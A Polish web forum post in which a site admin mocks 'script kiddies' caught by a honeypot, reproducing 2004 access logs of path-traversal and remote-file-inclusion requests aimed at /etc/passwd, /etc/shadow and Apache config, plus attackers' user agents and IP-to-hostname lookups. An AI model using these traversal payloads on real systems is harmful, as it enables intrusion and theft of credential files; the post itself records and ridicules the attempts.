Autor |
Wiadomość |
Anubis
Admin
Dołączył: 31 Sie 2007
Posty: 514
Przeczytał: 0 tematów
Pomógł: 38 razy Ostrzeżeń: 0/5 Skąd: Małopolska
|
|
Script-kiddie z dostępem do netu |
|
Po zastawieniu pułapki na lamerów okazuje się, że w sieci działają 2 grupy h0ck00r0w. Pierwsza składająca się z 12 IPków załapała się na maliny koło dwunastej. A druga 12 godzin później.
195.245.213.8 [01/Mar/2004:12:41:02 /index.php?m=../../../../../../etc/passwd 200
195.245.213.8 [01/Mar/2004:12:41:43 /index.php?m=../../../../../../etc/shadow 403
195.245.213.8 [01/Mar/2004:12:41:56 /index.php?m=../../../../../../etc/group 403
195.245.213.8 [01/Mar/2004:12:41:59 /index.php?m=../../../../../../etc/shadow 403
195.245.213.8 [01/Mar/2004:12:42:00 /index.php?m=../../../../../../etc/passwd 403
195.245.213.8 [01/Mar/2004:12:42:00 /index.php?m=../../../../../../etc/shadow 403
195.245.213.8 [01/Mar/2004:12:42:03 /index.php?m=page&pg_id=42 403
195.245.213.8 [01/Mar/2004:12:42:06 /index.php?m=page&pg_id=42 403
195.245.213.8 [01/Mar/2004:12:42:42 /index.php?m=page&pg_id=42 403
195.245.213.8 [01/Mar/2004:12:42:48 /index.php 403
195.245.213.8 [01/Mar/2004:12:47:25 /index.php?m=http://www.wp.pl 403
195.245.213.8 [01/Mar/2004:12:47:32 /index.php?m=http://www.wp.pl 403
62.233.173.118 [01/Mar/2004:12:47:32 /index.php?m=../../../../../../etc/passwd 200
62.21.63.21 [01/Mar/2004:12:47:45 /index.php?m=../../../../../../etc/passwd 200
212.182.0.179 [01/Mar/2004:12:48:00 /index.php?m=../../../../../../etc/passwd 200
193.0.74.236 [01/Mar/2004:12:48:20 /index.php?m=../../../../../../etc/passwd 200
212.182.0.179 [01/Mar/2004:12:48:26 /index.php?m=../../../../../../etc/inittab 403
212.182.0.179 [01/Mar/2004:12:48:34 /index.php?m=../../../../../../etc/issue 403
212.182.0.179 [01/Mar/2004:12:48:41 /index.php?m=../../../../../../etc/groups 403
212.182.0.179 [01/Mar/2004:12:48:48 /index.php?m=../../../../../../etc/passwd 403
62.233.173.118 [01/Mar/2004:12:49:02 /index.php?m=../../../../../../etc/group 403
212.182.0.179 [01/Mar/2004:12:49:06 /index.php?m=../../../../../../etc/passwd 403
62.233.173.118 [01/Mar/2004:12:49:06 /index.php?m=../../../../../../etc/passwd 403
193.0.74.236 [01/Mar/2004:12:49:32 /index.php?m=../../../../../../etc/motd 403
62.233.173.118 [01/Mar/2004:12:49:33 /index.php?m=../../../../../../etc/passwd 403
62.21.63.21 [01/Mar/2004:12:49:41 /index.php?m=../../../../../../etc/issue 403
62.233.173.118 [01/Mar/2004:12:49:45 /index.php?m=../../../../../../etc/passwd 403
62.21.63.21 [01/Mar/2004:12:49:49 /index.php?m=../../../../../../etc/passwd 403
212.182.0.179 [01/Mar/2004:12:49:52 /index.php?m=../../../../../../etc/passwd 403
212.182.0.179 [01/Mar/2004:12:50:35 /index.php 403
193.0.74.236 [01/Mar/2004:12:50:45 /index.php?m=../../../../../../etc/apache/httpd.conf 403
62.111.224.130 [01/Mar/2004:12:50:47 /index.php?m=../../../../../../etc/passwd 200
193.0.74.236 [01/Mar/2004:12:51:21 /index.php?m=../../../../../../var/www 403
62.111.224.130 [01/Mar/2004:12:51:35 /index.php?m=../../../../../../etc/passwd 403
195.245.213.8 [01/Mar/2004:12:56:00 /index.php?m=http://www.wp.pl 403
195.245.213.8 [01/Mar/2004:12:56:01 /index.php 403
195.245.213.8 [01/Mar/2004:12:56:02 /index.php?m=page&pg_id=42 403
62.87.189.119 [01/Mar/2004:12:59:15 /index.php?m=../../../../../../etc/passwd 200
62.87.189.119 [01/Mar/2004:12:59:41 /index.php?m=page&pg_id=16 403
62.87.189.119 [01/Mar/2004:13:00:03 /index.php?m=../../../../../../etc/issue 403
62.87.189.119 [01/Mar/2004:13:00:06 /index.php?m=../../../../../../etc/issue.net 403
62.87.189.119 [01/Mar/2004:13:00:15 /index.php?m=../../../../../../etc/passwd 403
80.54.227.52 [01/Mar/2004:13:04:05 /index.php?m=../../../../../../etc/passwd 200
62.21.63.21 [01/Mar/2004:13:05:37 /index.php?m=../../../../../../etc/passwd 403
195.245.213.8 [01/Mar/2004:13:05:38 /index.php?m=../../../../../../etc/passwd 403
195.245.213.8 [01/Mar/2004:13:05:45 /index.php?m=../../../../../../etc/passwd 403
80.54.227.52 [01/Mar/2004:13:06:23 /index.php?m=../../../../../../etc/passwd 403
80.54.227.52 [01/Mar/2004:13:06:51 /index.php?m=../../../../../../etc/inittab 403
80.55.36.26 [01/Mar/2004:13:07:33 /index.php?m=../../../../../../etc/motd 302
212.244.218.42 [01/Mar/2004:13:08:31 /index.php?m=../../../../../../etc/inittab 403
80.55.36.26 [01/Mar/2004:13:09:04 /index.php?m=../../../../../../etc/apache/httpd.conf 403
80.55.36.26 [01/Mar/2004:13:09:18 /index.php 403
80.55.36.26 [01/Mar/2004:13:09:19 /index.php 403
80.55.36.26 [01/Mar/2004:13:09:21 /index.php 403
212.244.218.2 [01/Mar/2004:13:09:23 /index.php?m=../../../../../../etc/inittab 403
217.153.60.98 [01/Mar/2004:14:46:27 /index.php?m=page&pg_id=47 403
80.50.33.97 [02/Mar/2004:00:37:09 /index.php?m=../../../../../../etc/passwd 200
217.30.149.192 [02/Mar/2004:00:37:23 /index.php?m=../../../../../../etc/passwd 200
217.30.149.192 [02/Mar/2004:00:37:34 /index.php?m=../../../../../../etc/passwd 403
80.50.33.97 [02/Mar/2004:00:37:46 /index.php? 403
194.9.223.27 [02/Mar/2004:00:38:34 /index.php?m=../../../../../../etc/passwd 200
217.30.149.192 [02/Mar/2004:00:38:49 /index.php?m=page&pg_id=16 403
213.76.55.193 [02/Mar/2004:00:39:01 /index.php?m=../../../../../../etc/passwd 200
194.9.223.27 [02/Mar/2004:00:39:24 /index.php?m=http://costam 403
194.9.223.27 [02/Mar/2004:00:39:33 /index.php?m=../../../../../../etc/passwd 403
213.199.194.22 [02/Mar/2004:00:39:53 /index.php?m=../../../../../../etc/passwd 200
213.199.194.22 [02/Mar/2004:00:40:23 /index.php?m=../../../../../../etc/fstab 403
213.199.194.22 [02/Mar/2004:00:40:34 /index.php?m=../../../../../../etc/group 403
213.199.194.22 [02/Mar/2004:00:40:36 /index.php?m=../../../../../../etc/groups 403
213.199.194.22 [02/Mar/2004:00:40:41 /index.php?m=../../../../../../etc/motd 403
213.76.55.193 [02/Mar/2004:00:41:55 /index.php?m=../../../../../../etc/motd 403
213.76.55.193 [02/Mar/2004:00:41:59 /index.php?m=../../../../../../etc/passw 403
194.9.223.27 [02/Mar/2004:00:42:02 /index.php?m=htp://www.tiamak.republika.pl/test 403
213.76.55.193 [02/Mar/2004:00:42:03 /index.php?m=../../../../../../etc/passwd 403
213.76.55.193 [02/Mar/2004:00:42:05 /index.php?m=../../../../../../etc/passwd 403
194.9.223.27 [02/Mar/2004:00:42:07 /index.php?m=page&pg_id=17 403
194.9.223.27 [02/Mar/2004:00:42:37 /index.php?m=./.././.././.././.././.././.././.././../etc/passwd 403
194.9.223.27 [02/Mar/2004:00:42:41 /index.php?m=./.././.././.././.././.././.././.././../etc/passwd 403
Pozwolę sobie podsumować:
* prawdziwy h0ck00r używa nastepujących przeglądarek:
curl/7.10.3 (i686-pc-linux-gnu) libcurl/7.10.3 OpenSSL/0.9.7c zlib/1.1.4
curl/7.3 (i686-pc-linux-gnu) libcurl 7.3 (SSL 0.9.5)
Links (0.98; Linux 2.6.3-1-386 i586; 80x24)
Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; FunWebProducts)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 4.0; FunWebProducts)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; MyIE2; .NET CLR 1.1.4322)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.23 [pl]
Mozilla/5.0 (compatible; Konqueror/3.1; Linux)
Mozilla/5.0 (Windows NT 5.1; U) Opera 7.23 [pl]
Mozilla/5.0 (Windows; U; Windows NT 5.0; pl-PL; rv:1.6) Gecko/20040206 Firefox/0.8
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031007
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.5) Gecko/20031120
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040117
Opera/7.21 (Windows 98; U) [pl]
Opera/7.23 (Windows NT 5.1; U) [pl]
w3m/0.3.2.2
Oczywiście Microsoft & IE rulez.
PS. niech ten drugi sobie lepiej uaktualni OpenSSL-a bo z myśliwego stanie sie zwierzyną.
* goście muszą siedzieć na jakimś ircu lub mieć szybki sposób komunikowania się.
Świadczy o tym rozpiętość czasowa ich wizyt, po kilku minutach od pierwszego wejścia już na stronie była cała watacha żądnych sensacji (czyt. /etc/shadow) h0ck00r0w. Swoja droga ciekaw jestem jakie zjebki dostał gościu, który pierwszy zauważył "lukę" kiedy się zorientowali (?) w mistyfikacji.
* używają raczej dial-upów lub dynamicznych IPków.
193.0.74.236 dhcp236.dwi.uw.edu.pl
194.9.223.27 gprs1.idea.pl
195.214.216.10 e-konta.pl
195.245.213.8 Telewizja Polska S.A. ul. Woronicza 17
212.182.0.179 magellan.umcs.lublin.pl
212.244.218.2 jessie.lonet.gdynia.pl
212.244.218.42 hell.org.pl
213.199.194.22 imp.mt.pl
213.76.55.193 pb193.torun.cvx.ppp.tpnet.pl
217.153.60.98 GTS Internet Partners
217.30.149.192 dial-192.bielsko.dialog.net.pl
217.97.227.138 PIRXNET-GLIWICE
62.111.224.130 host-ip130-224.crowley.pl
62.21.63.21 bacza.icpnet.pl
62.233.173.118 FUTURO-MAN
62.87.189.119 dial-631.bielsko.dialog.net.pl
80.50.33.97 ei97.neoplus.adsl.tpnet.pl
80.54.227.52 de52.neoplus.adsl.tpnet.pl
80.55.36.26 pavulon.apteka.com.pl, sir "LANcaster"
* i jednego proxy
212.182.14.43 matpc-14-43.umcs.lublin.pl
Jeżeli powyższe IPki to OpenProxy to ja nic na to nie poradzę, nie chce mi się tego sprawdzać.
krótko mówiąc ekipa apcohu... nie, no myślałem panowie, że co jak co ale takiemu lamerowi jak ja nie uda się nabić Was w butelkę...
* metody postępowania
używają googli w celu znalezienia odpowiedniego ciągu znaków w URLu (nie powiem czego dokładnie, nie chcę całej armii script-kiddie). Świadczy o tym nagłówek HTTP_REFERER. Zresztą zajrzyjcie na stronę tiamaka (pozdrawiam, gratuluję potomka, 403 Forbidden).
pozwolę sobie zacytować kawałek majla od tiamaka:
to jest sciema conie z tym passwd ktorym wszyscy sie podniecaja ??
normalnie mie tu ludzie wczoraj az orgazma mieli ;]
az sam musialem luknac
ale to nie wyglada normalnie
moim zdaniem to jest taki fake dla lamuhuf
ODP: przepraszam, nie mogę odpisać, nie mogę się z podłogi podnieść ROTFL
Jak widać na załączonym obrazku wszyscy ci, którzy zechcą przetestować moje zabezpieczenia dostają 403 Forbidden i poczytne miejsce na liście banów.
Jeżeli chcesz się dowiedzieć co takiego przygotowałem dla gości specjalnych, nie wstawiaj w pasku adresu /etc/passwd pobaw się pg_id, wiedząc, że strony-pułapki robiłem dość niedawno... Chyba nie dość wyraźnie zaznaczyłem, że pg_id to liczba dodatnia a nie ciąg znaków, a ja posiadam odpowiednie validatory na wejściu.
Post został pochwalony 0 razy
|
|
Pon 18:49, 28 Sty 2008 |
|
|
|
|
|
|
Nie możesz pisać nowych tematów Nie możesz odpowiadać w tematach Nie możesz zmieniać swoich postów Nie możesz usuwać swoich postów Nie możesz głosować w ankietach
|
|
|